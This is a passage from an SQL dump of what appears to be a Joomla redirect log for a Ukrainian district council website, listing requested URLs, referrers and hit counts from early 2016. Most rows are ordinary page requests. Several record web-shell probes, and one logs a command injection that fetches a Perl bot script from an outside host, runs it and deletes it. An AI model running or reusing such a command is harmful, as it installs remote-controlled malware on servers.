00:00:00',301),(25320,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja?tmpl=component&print=1&layout=default&page=&catid=79&id=1277:pro-ugodu-mizh-zhitomirskoyu-oblasnoyu-radoyu-ta-malinskoyu-rajonnoyu-radoyu','','','',2,0,'2016-01-23 14:17:53','0000-00-00 00:00:00',301),(25321,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja?tmpl=component&print=1&layout=default&page=&catid=79&id=1294:pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-derzhavnoji-administratsiji','','','',2,0,'2016-01-23 14:17:54','0000-00-00 00:00:00',301),(25322,'http://malyn-rayrada.org.ua/ index.php','','','',1,0,'2016-01-23 16:37:36','0000-00-00 00:00:00',301),(25323,'http://www.malyn-rayrada.org.ua/ index.php','','','',1,0,'2016-01-23 16:37:40','0000-00-00 00:00:00',301),(25324,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-?start=10','','','',2,0,'2016-01-23 23:04:51','0000-00-00 00:00:00',301),(25325,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=47&layout=blog&Itemid=86&lang=uk&limitstart=25','','','',1,0,'2016-01-24 07:11:08','0000-00-00 00:00:00',301),(25326,'http://www.malyn-rayrada.org.ua/index.php?catid=839&id=839:do-vidoma-zhiteliv-malinshhini-3','','','',3,0,'2016-01-24 07:25:47','0000-00-00 00:00:00',301),(25327,'http://www.malyn-rayrada.org.ua/images/stories/pbot.php','','','',2,0,'2016-01-24 09:14:37','0000-00-00 00:00:00',301),(25328,'http://www.malyn-rayrada.org.ua/zdravoe.com/inc/upload.php','','','',1,0,'2016-01-24 09:15:03','0000-00-00 00:00:00',301),(25329,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=236:-192011-&catid=11&lang=en&Itemid=','','','',1,0,'2016-01-24 12:39:33','0000-00-00 00:00:00',301),(25330,'http://www.malyn-rayrada.org.ua/wordpress/','','','',1,0,'2016-01-24 13:47:15','0000-00-00 00:00:00',301),(25331,'http://www.malyn-rayrada.org.ua/wp/','','','',1,0,'2016-01-24 13:47:15','0000-00-00 00:00:00',301),(25332,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=570:2012-02-09-07-20-52&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2016-02-05 18:38:24','0000-00-00 00:00:00',301),(25333,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=439:2011-10-21-16-22-19&catid=37:--21102011-&Itemid=72&lang=ru','','','',7,0,'2016-02-05 18:57:28','0000-00-00 00:00:00',301),(25334,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=627:2012-04-02-15-57-23&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2016-02-05 19:51:58','0000-00-00 00:00:00',301),(25335,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=93:-----------2007-2010-&catid=26&Itemid=54&lang=uk','','','',4,0,'2016-02-05 19:52:15','0000-00-00 00:00:00',301),(25336,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=644:2012-04-04-09-52-48&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2016-02-05 20:15:13','0000-00-00 00:00:00',301),(25337,'http://www.malyn-rayrada.org.ua/index.php?Itemid=78&id=41:--27042012-&lang=uk&layout=blog&option=com_content&view=category','','http://go.mail.ru/search_images','',4,0,'2016-02-05 20:37:02','0000-00-00 00:00:00',301),(25339,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&id=53:--25102013-&lang=uk&layout=blog&limitstart=10&option=com_content&view=category','','http://go.mail.ru/search_images','',1,0,'2016-02-05 21:53:47','0000-00-00 00:00:00',301),(25340,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=823:2012-11-14-16-52-28&catid=45:--14112012-&Itemid=84&lang=ru','','','',24,0,'2016-02-05 23:15:59','0000-00-00 00:00:00',301),(25341,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=359:2011-06-30-11-10-42&catid=35&Itemid=69&lang=ru','','','',4,0,'2016-02-05 23:16:07','0000-00-00 00:00:00',301),(25342,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=418:2011-09-29-08-40-03&catid=37:--21102011-&Itemid=72&lang=ru','','','',4,0,'2016-02-05 23:16:09','0000-00-00 00:00:00',301),(25343,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=642:2012-04-03-12-53-05&catid=32:2011-03-31-12-03-04&Itemid=64&lang=ru','','','',27,0,'2016-02-06 00:50:54','0000-00-00 00:00:00',301),(25344,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/images/stories/kashitsa.jpg','','','',1,0,'2016-02-06 02:01:22','0000-00-00 00:00:00',301),(25345,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&id=47&lang=uk&layout=blog&limitstart=15&option=com_content&view=category','','http://go.mail.ru/search_images','',1,0,'2016-02-06 02:14:59','0000-00-00 00:00:00',301),(25346,'http://www.malyn-rayrada.org.ua/index.php?Itemid=80&id=42:--16052012-&lang=en&layout=blog&limitstart=5&option=com_content&view=category','','http://go.mail.ru/search_images','',2,0,'2016-02-06 03:10:18','0000-00-00 00:00:00',301),(25347,'http://malyn-rayrada.org.ua/index.php?id=38&itemid=73&lang=uk&layout=blog&option=com_content&view=category','','http://go.mail.ru/search_images','',2,0,'2016-02-06 06:36:56','0000-00-00 00:00:00',301),(25348,'http://www.malyn-rayrada.org.ua/index.php/719-vidminnosti-norm-konstitucij-u-redakcii-1996-i/','','http://go.mail.ru/search_images','',1,0,'2016-02-06 06:40:44','0000-00-00 00:00:00',301),(25349,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&id=33:-20052011&lang=uk&layout=blog&limitstart=20&option=com_content&view=category','','http://go.mail.ru/search_images','',2,0,'2016-02-06 06:40:45','0000-00-00 00:00:00',301),(25350,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/malinshchina-ta-malinchani/2014-09-22-17-50-18','','','',37,0,'2016-02-06 10:38:38','0000-00-00 00:00:00',301),(25351,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/729--l20-r?Itemid=0&lang=ru','','','',1,0,'2016-02-06 10:59:26','0000-00-00 00:00:00',301),(25352,'http://www.malyn-rayrada.org.ua/index.php/685-z-novim-rokom-ta-rizdvom-hristovim_2','','','',39,0,'2016-02-06 11:00:41','0000-00-00 00:00:00',301),(25353,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=562:--------19122011194---30122011202&catid=36&Itemid=70&lang=ru','','','',2,0,'2016-02-06 12:11:52','0000-00-00 00:00:00',301),(25354,'http://www.malyn-rayrada.org.ua/index.php?Itemid=85&id=46:--21122012&lang=en&layout=blog&limitstart=5&option=com_content&view=category','','http://go.mail.ru/search_images','',1,0,'2016-02-06 12:28:22','0000-00-00 00:00:00',301),(25355,'http://www.malyn-rayrada.org.ua/index.php/462-za-materialami-zvernen-rajonnoi-radi','','','',16,0,'2016-02-06 12:28:39','0000-00-00 00:00:00',301),(25356,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-?start=10','','','',7,0,'2016-02-06 12:32:33','0000-00-00 00:00:00',301),(25357,'http://www.malyn-rayrada.org.ua/index.php?Itemid=77&id=40:--28032012-&lang=uk&layout=blog&limitstart=15&option=com_content&view=category','','http://go.mail.ru/search_images','',2,0,'2016-02-06 12:44:31','0000-00-00 00:00:00',301),(25358,'http://www.malyn-rayrada.org.ua/index.php/691-shhodo-situacii-z-medichnim-obslugovuvannjam','','http://go.mail.ru/search_images','',29,0,'2016-02-06 16:04:25','0000-00-00 00:00:00',301),(25359,'http://www.malyn-rayrada.org.ua/index.php/101-hristijanskij-svit-svjatkue-verbnu-nedilju-ta','','http://go.mail.ru/search_images','',15,0,'2016-02-06 17:18:05','0000-00-00 00:00:00',301),(25360,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=441:-l-2011-2014-r-&catid=37:--21102011-&Itemid=72&lang=ru','','','',12,0,'2016-02-06 18:09:34','0000-00-00 00:00:00',301),(25361,'http://www.malyn-rayrada.org.ua/index.php/1132-zastupnik-keruyuchogo-nachalnik-viddilu-rozvitku-bankivskogo-biznesu-tvbv-10005-038-filiji-zhitomirskogo-oblasnogo-upravlinnya-at-oshchadbank-mikhajlenko-s-m-informue/','','http://go.mail.ru/search_images','',1,0,'2016-02-06 20:11:33','0000-00-00 00:00:00',301),(25362,'http://www.malyn-rayrada.org.ua/index.php/305-informacija-pro-robotu-komisii-z-pitan-prodazhu','','http://go.mail.ru/search_images','',21,0,'2016-02-06 21:00:03','0000-00-00 00:00:00',301),(25363,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=577:--------2011--&catid=39&Itemid=76&lang=ru','','','',4,0,'2016-02-06 21:07:22','0000-00-00 00:00:00',301),(25364,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=367:-1620-19072011-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2016-02-06 22:09:19','0000-00-00 00:00:00',301),(25365,'http://malyn-rayrada.org.ua/index.php/890-upravlinnya-pratsi-ta-sotsialnogo-zakhistu-naselennya-rajderzhadministratsiji-informue','','','',12,0,'2016-02-06 22:35:20','0000-00-00 00:00:00',301),(25366,'http://malyn-rayrada.org.ua/index.php/722-bez-komentariv','','','',15,0,'2016-02-06 22:35:34','0000-00-00 00:00:00',301),(25367,'http://malyn-rayrada.org.ua/index.php/753-do-vidoma-deputativ-rajonnoi-radi_3','','','',14,0,'2016-02-06 22:35:34','0000-00-00 00:00:00',301),(25368,'http://malyn-rayrada.org.ua/index.php/939-malinski-podatkivtsi-informuyut','','','',11,0,'2016-02-06 22:35:38','0000-00-00 00:00:00',301),(25369,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=10:2010-06-05-13-46-44&id=996:2013-04-25-12-09-57&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=17&lang=uk','','','',1,0,'2016-02-07 00:37:46','0000-00-00 00:00:00',301),(25370,'http://www.malyn-rayrada.org.ua/index.php/845-gromadski-pasovishha-legalne-vikoristannja-i','','','',16,0,'2016-02-07 01:36:31','0000-00-00 00:00:00',301),(25371,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=18:2010-06-06-10-06-41&catid=15&lang=uk','','','',9,0,'2016-02-07 01:54:53','0000-00-00 00:00:00',301),(25372,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=633:-2015-&catid=42:--16052012-&Itemid=80&lang=en','','','',1,0,'2016-02-07 05:53:33','0000-00-00 00:00:00',301),(25373,'http://www.malyn-rayrada.org.ua/index.php/953-nareshti-fraza-dnya','','','',14,0,'2016-02-07 06:36:00','0000-00-00 00:00:00',301),(25374,'http://www.malyn-rayrada.org.ua/images/stories/petx.php?cmd=curl+-C+-+-O+http://diamantiegemme.com/js/lib/jquery/bot.txt;perl+bot.txt;rm+bot.txt','','','',1,0,'2016-02-07 07:16:57','0000-00-00 00:00:00',301),(25375,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1349:-31-&Itemid=0&lang=ru&option=com_content&view=article','','','',5,0,'2016-02-07 11:53:29','0000-00-00 00:00:00',301),(25376,'http://www.malyn-rayrada.org.ua/index.php?catid=39:-22022012-&id=563:-30012012185-12&Itemid=76&lang=uk&option=com_content&view=article','','','',1,0,'2016-02-07 11:53:55','0000-00-00 00:00:00',301),(25377,'http://www.malyn-rayrada.org.ua/index.php?catid=51:--19072013-&id=1054:2013-07-19-11-38-20&Itemid=92&lang=en&option=com_content&view=article','','','',12,0,'2016-02-07 11:53:59','0000-00-00 00:00:00',301),(25378,'http://malyn-rayrada.org.ua/index.php/1350-upravlinnya-pensijnogo-fondu-ukrajini-v-malinskomu-rajoni-informue-pro-zmini-v-pensijnomu-zakonodavstvi-yaki-vstupili-v-diyu-z-pochatku-roku','','','',1,0,'2016-02-07 12:53:15','0000-00-00 00:00:00',301),(25379,'http://malyn-rayrada.org.ua/index.php/1350-upravlinnya-pensijnogo-fondu-ukrajini-v-malinskomu-rajoni-informue-pro-zmini-v-pensijnomu-zakonodavstvi-yaki-vstupili-v-diyu-z-pochatku-roku?tmpl=component&print=1&layout=default&page=','','','',1,0,'2016-02-07 12:53:25','0000-00-00 00:00:00',301),(25388,'http://www.malyn-rayrada.org.ua/index.php/796-z-dnem-peremogi_2','','','',17,0,'2016-02-07 15:39:27','0000-00-00 00:00:00',301),(25389,'http://www.malyn-rayrada.org.ua/index.php/951-1','','','',17,0,'2016-02-07 15:40:58','0000-00-00 00:00:00',301),(25390,'http://www.malyn-rayrada.org.ua/index.php/41-z-dnem-peremogi','','','',39,0,'2016-02-07 16:12:45','0000-00-00 00:00:00',301),(25391,'http://www.malyn-rayrada.org.ua/index.php/722-bez-komentariv','','','',20,0,'2016-02-07 16:12:58','0000-00-00 00:00:00',301),(25392,'http://www.malyn-rayrada.org.ua/index.php/798-ogoloshennja_16','','','',20,0,'2016-02-07 16:15:32','0000-00-00 00:00:00',301),(25393,'http://www.malyn-rayrada.org.ua/index.php/563-do-vidoma-zhiteliv-malinshhini_2','','','',30,0,'2016-02-07 16:40:21','0000-00-00 00:00:00',301),(25394,'http://www.malyn-rayrada.org.ua/index.php/975-pro-priznachennya-v-litvinenka-golovoyu-malinskoji-rajonnoji-derzhavnoji-administratsiji-zhitomirskoji-oblasti','','','',38,0,'2016-02-07 16:47:54','0000-00-00 00:00:00',301),(25395,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1350-pro-zatverdzhennya-tekhnichnoji-dokumentatsiji-pro-normativnu-groshovu-otsinku-zemelnoji-dilyanki-shcho-peredaetsya-v-orendu-vkf-buki-ltd-u-formi-tov','','','',1,0,'2016-02-07 17:15:52','0000-00-00 00:00:00',301),(25396,'http://www.malyn-rayrada.org.ua/index.php/1350-upravlinnya-pensijnogo-fondu-ukrajini-v-malinskomu-rajoni-informue-pro-zmini-v-pensijnomu-zakonodavstvi-yaki-vstupili-v-diyu-z-pochatku-roku?tmpl=component&print=1&layout=default&page=','','','',1,0,'2016-02-07 17:29:10','0000-00-00 00:00:00',301),(25397,'http://www.malyn-rayrada.org.ua/index.php/1054-z-24-lyutogo-po-24-bereznya-v-ukrajini-provodivsya-misyachnik-borotbi-z-tuberkulozom','','','',38,0,'2016-02-07 18:18:14','0000-00-00 00:00:00',301),(25398,'http://www.malyn-rayrada.org.ua/index.php/1251-pro-sklikannya-3-sesiji-rajonnoji-radi-7-sklikannya','','','',15,0,'2016-02-07 21:12:41','0000-00-00 00:00:00',301),(25399,'http://www.malyn-rayrada.org.ua/index.php/957-malinska-rajonna-blagodijna-organizatsiya-zakhist-ditej-chornobilya-informue','','','',24,0,'2016-02-07 23:21:50','0000-00-00 00:00:00',301),(25400,'http://www.malyn-rayrada.org.ua/index.php/905-pristupili-do-vikonannya-obov-yazkiv-novoobrani-golovi-teritorialnikh-gromad','','','',28,0,'2016-02-08 03:08:46','0000-00-00 00:00:00',301),(25401,'http://www.malyn-rayrada.org.ua/index.php/1262-viddil-statistiki-informue','','','',20,0,'2016-02-08 07:03:29','0000-00-00 00:00:00',301),(25402,'http://www.malyn-rayrada.org.ua/index.php/970-pro-cotsialno-ekonomichne-stanovishche-malinskogo-rajonu-za-sichen-listopad-2014-roku','','','',8,0,'2016-02-08 07:03:50','0000-00-00 00:00:00',301),(25403,'http://www.malyn-rayrada.org.ua/index.php/1213-upravlinnya-derzhgeokadastru-u-malinskomu-rajoni-informue','','','',16,0,'2016-02-08 07:04:11','0000-00-00 00:00:00',301),(25404,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1037:-2013-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',2,0,'2016-02-08 07:06:38','0000-00-00 00:00:00',301),(25405,'http://malyn-rayrada.org.ua/index.php/434-kozhna-posluga-povinna-buti-oplachena','','','',3,0,'2016-02-08 07:34:24','0000-00-00 00:00:00',301),(25406,'http://malyn-rayrada.org.ua/index.php/434-kozhna-posluga-povinna-buti-oplachena?tmpl=component&print=1&layout=default&page=','','','',11,0,'2016-02-08 07:34:27','0000-00-00 00:00:00',301),(25407,'http://malyn-rayrada.org.ua/index.php/772-pravoslavni-hristijani-svjatkujut-sogodni-verbnu','','','',5,0,'2016-02-08 07:34:39','0000-00-00 00:00:00',301),(25408,'http://malyn-rayrada.org.ua/index.php/772-pravoslavni-hristijani-svjatkujut-sogodni-verbnu?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-02-08 07:34:44','0000-00-00 00:00:00',301),(25409,'http://malyn-rayrada.org.ua/index.php/782-dani-pro-vikonannja-dohidnoi-chastini-bjudzhetiv','','','',5,0,'2016-02-08 07:34:57','0000-00-00 00:00:00',301),(25410,'http://malyn-rayrada.org.ua/index.php/788-do-vidoma-pensioneriv_3','','','',12,0,'2016-02-08 07:35:00','0000-00-00 00:00:00',301),(25411,'http://malyn-rayrada.org.ua/index.php/788-do-vidoma-pensioneriv_3?tmpl=component&print=1&layout=default&page=','','','',12,0,'2016-02-08 07:35:02','0000-00-00 00:00:00',301),(25412,'http://malyn-rayrada.org.ua/index.php/790-do-vidoma-deputativ-rajonnoi-radi_4','','','',3,0,'2016-02-08 07:35:05','0000-00-00 00:00:00',301),(25413,'http://malyn-rayrada.org.ua/index.php/796-z-dnem-peremogi_2','','','',5,0,'2016-02-08 07:35:08','0000-00-00 00:00:00',301),(25414,'http://malyn-rayrada.org.ua/index.php/796-z-dnem-peremogi_2?tmpl=component&print=1&layout=default&page=','','','',12,0,'2016-02-08 07:35:10','0000-00-00 00:00:00',301),(25415,'http://malyn-rayrada.org.ua/index.php/799-pro-sklikannja-31-sesii-rajonnoi-radi-6-sklikannja?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-02-08 07:35:13','0000-00-00 00:00:00',301),(25416,'http://malyn-rayrada.org.ua/index.php/841-nachalnik-pensijnogo-fondu-ukraini-v-malinskomu?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-02-08 07:35:19','0000-00-00 00:00:00',301),(25417,'http://malyn-rayrada.org.ua/index.php/845-gromadski-pasovishha-legalne-vikoristannja-i','','','',6,0,'2016-02-08 07:35:21','0000-00-00 00:00:00',301),(25418,'http://malyn-rayrada.org.ua/index.php/845-gromadski-pasovishha-legalne-vikoristannja-i?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-02-08 07:35:24','0000-00-00 00:00:00',301),(25419,'http://malyn-rayrada.org.ua/index.php/878-do-vidoma-zhiteliv-malinshchini?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-02-08 07:35:31','0000-00-00 00:00:00',301),(25420,'http://malyn-rayrada.org.ua/index.php/917-upravlinnya-pensijnogo-fondu-ukrajini-v-malinskomu-rajoni-zhitomirskoji-oblasti-informue','','','',15,0,'2016-02-08 07:35:37','0000-00-00 00:00:00',301),(25421,'http://malyn-rayrada.org.ua/index.php/919-sotsialno-ekonomichne-stanovishche-malinskogo-rajonu-za-sichen-veresen-2014-roku','','','',15,0,'2016-02-08 07:35:41','0000-00-00 00:00:00',301),(25422,'http://malyn-rayrada.org.ua/index.php/919-sotsialno-ekonomichne-stanovishche-malinskogo-rajonu-za-sichen-veresen-2014-roku?tmpl=component&print=1&layout=default&page=','','','',15,0,'2016-02-08 07:35:44','0000-00-00 00:00:00',301),(25423,'http://malyn-rayrada.org.ua/index.php/920-oberezhno-chuma-svinej-uzhe-v-ivankivskomu-rajoni','','','',4,0,'2016-02-08 07:35:46','0000-00-00 00:00:00',301),(25424,'http://malyn-rayrada.org.ua/index.php/939-malinski-podatkivtsi-informuyut?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-02-08 07:35:54','0000-00-00 00:00:00',301),(25425,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen?catid=1350&id=1350:upravlinnya-pensijnogo-fondu-ukrajini-v-malinskomu-rajoni-informue-pro-zmini-v-pensijnomu-zakonodavstvi-yaki-vstupili-v-diyu-z-pochatku-roku','','','',2,0,'2016-02-08 07:37:14','0000-00-00 00:00:00',301),(25426,'http://www.malyn-rayrada.org.ua/wsdl.php','','','',1,0,'2016-02-08 08:14:36','0000-00-00 00:00:00',301),(25427,'http://www.malyn-rayrada.org.ua/wp_stkkn.php','','','',1,0,'2016-02-08 08:14:36','0000-00-00 00:00:00',301),(25428,'http://www.malyn-rayrada.org.ua/sql.php','','','',1,0,'2016-02-08 08:14:37','0000-00-00 00:00:00',301),(25429,'http://www.malyn-rayrada.org.ua/privacy.php?youfindit=1','','','',1,0,'2016-02-08 08:14:37','0000-00-00 00:00:00',301),(25430,'http://www.malyn-rayrada.org.ua/post.php','','','',1,0,'2016-02-08 08:14:38','0000-00-00 00:00:00',301),(25431,'http://www.malyn-rayrada.org.ua/indexs.php','','','',1,0,'2016-02-08 08:14:38','0000-00-00 00:00:00',301),(25432,'http://www.malyn-rayrada.org.ua/green.php','','','',1,0,'2016-02-08 08:14:39','0000-00-00 00:00:00',301),(25433,'http://www.malyn-rayrada.org.ua/cookietest.php','','','',1,0,'2016-02-08 08:14:39','0000-00-00 00:00:00',301),(25434,'http://www.malyn-rayrada.org.ua/conns.php','','','',1,0,'2016-02-08 08:14:40','0000-00-00 00:00:00',301),(25435,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=1106:-qq&lang=ru&option=com_content&view=article','','','',10,0,'2016-02-08 08:15:21','0000-00-00 00:00:00',301),(25436,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=619:-11-6-&Itemid=0&lang=ru&option=com_content&view=article','','','',3,0,'2016-02-08 09:10:27','0000-00-00 00:00:00',301),(25437,'http://www.malyn-rayrada.org.ua/index.php/1004-komunalne-pidpriemstvo-akhplan-malinskoji-rajonnoji-radi-ogoloshue-pro-namir-peredati-nerukhome-majno-v-orendu','','','',16,0,'2016-02-08 09:13:42','0000-00-00 00:00:00',301),(25438,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=466:-l-r-2011-&catid=38&Itemid=73&lang=uk','','','',7,0,'2016-02-08 10:20:33','0000-00-00 00:00:00',301),(25439,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=36&Itemid=70&lang=uk','','','',2,0,'2016-02-08 11:33:27','0000-00-00 00:00:00',301),(25440,'http://malyn-rayrada.org.ua/index.php/946-z-dnem-mistsevogo-samovryaduvannya','','','',5,0,'2016-02-08 12:18:22','0000-00-00 00:00:00',301),(25441,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=ru&id=829:24-1600-l-r','','http://yandex.ua/clck/jsredir?from=yandex.ua%3Bsearch%2F%3Bweb%3B%3B&text=&etext=958.2VU6xMPg-VY1W6kjZBuowtD_unr7tXZEWcFeqWiybvTsh7HYpA-JRv5TmwUSGpKtz','',6,0,'2016-02-08 12:33:21','0000-00-00 00:00:00',301),(25442,'http://www.malyn-rayrada.org.ua/index.php/1238-pro-sklikannya-2-sesiji-rajonnoji-radi-7-sklikannya','','','',15,0,'2016-02-08 14:03:55','0000-00-00 00:00:00',301),(25443,'http://www.malyn-rayrada.org.ua/index.php?catid=47&id=905:-2012-2015-&Itemid=86&lang=uk&option=com_content&view=article','','','',25,0,'2016-02-08 15:25:09','0000-00-00 00:00:00',301),(25444,'http://www.malyn-rayrada.org.ua/index.php/1041-informue-nachalnik-upravlinnya-pensijnogo-fondu-ukrajini-v-malinskomu-rajoni-malegus-a-s','','','',15,0,'2016-02-08 19:03:27','0000-00-00 00:00:00',301),(25445,'http://malyn-rayrada.org.ua/index.php/323-hristos-rozhdaetsja-slavimo-jogo?tmpl=component&print=1&layout=default&page=','','','',7,0,'2016-02-08 21:32:32','0000-00-00 00:00:00',301),(25446,'http://malyn-rayrada.org.ua/index.php/390-malinshhina-svjatkue-90-richchja-utvorennja-rajonu','','','',8,0,'2016-02-08 21:32:37','0000-00-00 00:00:00',301),(25447,'http://www.malyn-rayrada.org.ua/components/com_content/mods.php','','','',1,0,'2016-02-08 22:36:34','0000-00-00 00:00:00',301),(25448,'http://www.malyn-rayrada.org.ua/LICEMSE.php','','','',1,0,'2016-02-08 22:36:34','0000-00-00 00:00:00',301),(25449,'http://www.malyn-rayrada.org.ua/images/mod_artlcle.php?images=1','','','',1,0,'2016-02-08 22:36:35','0000-00-00 00:00:00',301),(25450,'http://www.malyn-rayrada.org.ua/images/wp-includ.php','','','',1,0,'2016-02-08 22:36:35','0000-00-00 00:00:00',301),(25451,'http://www.malyn-rayrada.org.ua/index.php/729-vitaemo-usih-zhinok-iz-svjatom-vesni','','','',19,0,'2016-02-09 00:50:32','0000-00-00 00:00:00',301),(25452,'http://www.malyn-rayrada.org.ua/index.php?catid=45:--14112012-&id=791:2012-10-17-06-06-34&Itemid=84&lang=uk&option=com_content&view=article','','','',17,0,'2016-02-09 04:23:56','0000-00-00 00:00:00',301),(25453,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=813:2012-11-12-16-44-40&Itemid=&lang=en&option=com_content&view=article','','','',4,0,'2016-02-09 04:27:45','0000-00-00 00:00:00',301),(25454,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=466:--------l-r------2011-&Itemid=70&lang=en&option=com_content&view=article','','','',5,0,'2016-02-09 04:27:49','0000-00-00 00:00:00',301),(25455,'http://malyn-rayrada.org.ua/index.php/41-z-dnem-peremogi','','','',15,0,'2016-02-09 06:31:29','0000-00-00 00:00:00',301),(25456,'http://malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=836:-6732012&lang=uk&option=com_content&view=article','','','',4,0,'2016-02-09 08:25:38','0000-00-00 00:00:00',301),(25457,'http://www.malyn-rayrada.org.ua/index.php?Itemid=95&catid=54&id=1151:2013-11-28-14-54-33&lang=uk&option=com_content&view=article','','','',3,0,'2016-02-09 11:16:04','0000-00-00 00:00:00',301),(25458,'http://www.malyn-rayrada.org.ua/index.php?Itemid=60&catid=29:--15122010-&id=193:------------2009-2010-&lang=uk&option=com_content&view=article','','','',2,0,'2016-02-09 11:28:39','0000-00-00 00:00:00',301),(25459,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=687:2012-05-24-11-21-04&Itemid=14&lang=en&option=com_content&view=article','','','',81,0,'2016-02-09 12:50:15','0000-00-00 00:00:00',301),(25460,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=466:-l-r-2011-&Itemid=73&lang=ru&option=com_content&view=article','','','',43,0,'2016-02-09 13:33:00','0000-00-00 00:00:00',301),(25461,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=813:2012-11-12-16-44-40&Itemid=14&lang=en&option=com_content&view=article','','','',53,0,'2016-02-09 13:33:00','0000-00-00 00:00:00',301),(25462,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=687:2012-05-24-11-21-04&lang=ru&option=com_content&view=article','','','',9,0,'2016-02-09 13:33:01','0000-00-00 00:00:00',301),(25463,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=ru&id=687:2012-05-24-11-21-04','','','',19,0,'2016-02-09 13:33:05','0000-00-00 00:00:00',301),(25464,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=1106:-qq&Itemid=0&lang=en&option=com_content&view=article','','','',46,0,'2016-02-09 14:16:00','0000-00-00 00:00:00',301),(25465,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=791:2012-10-17-06-06-34&Itemid=70&lang=en&option=com_content&view=article','','','',34,0,'2016-02-09 14:16:06','0000-00-00 00:00:00',301),(25466,'http://www.malyn-rayrada.org.ua/index.php?catid=33:-20052011&id=323:--------2007--2011-&Itemid=66&lang=uk&option=com_content&view=article','','','',31,0,'2016-02-09 14:16:19','0000-00-00 00:00:00',301),(25467,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=687:2012-05-24-11-21-04&Itemid=0&lang=en&option=com_content&view=article','','','',49,0,'2016-02-09 14:16:22','0000-00-00 00:00:00',301),(25468,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=1106:-qq&Itemid=&lang=en&option=com_content&view=article','','','',36,0,'2016-02-09 14:16:23','0000-00-00 00:00:00',301),(25469,'http://malyn-rayrada.org.ua/index.php?catid=945&id=945:perevirka','','','',5,0,'2016-02-09 14:58:25','0000-00-00 00:00:00',301),(25470,'http://www.malyn-rayrada.org.ua/index.php/890-upravlinnya-pratsi-ta-sotsialnogo-zakhistu-naselennya-rajderzhadministratsiji-informue','','','',16,0,'2016-02-09 15:10:29','0000-00-00 00:00:00',301),(25471,'http://www.malyn-rayrada.org.ua/index.php/972-do-vidoma-zhiteliv-malinshchini-informue-derzhzemagenstvo','','','',15,0,'2016-02-09 15:28:10','0000-00-00 00:00:00',301),(25472,'http://malyn-rayrada.org.ua/index.php/component/content/article?lang=uk&id=1102:2013-10-03-08-08-33','','','',1,0,'2016-02-09 15:29:07','0000-00-00 00:00:00',301),(25473,'http://www.malyn-rayrada.org.ua/index.php/1221-vid-zavtra-zhitimemo-za-zimovim-chasom','','','',27,0,'2016-02-09 15:29:23','0000-00-00 00:00:00',301),(25474,'http://www.malyn-rayrada.org.ua/index.php/1102-vitaemo-iz-svyatom-ostannogo-dzvonika','','','',22,0,'2016-02-09 15:30:21','0000-00-00 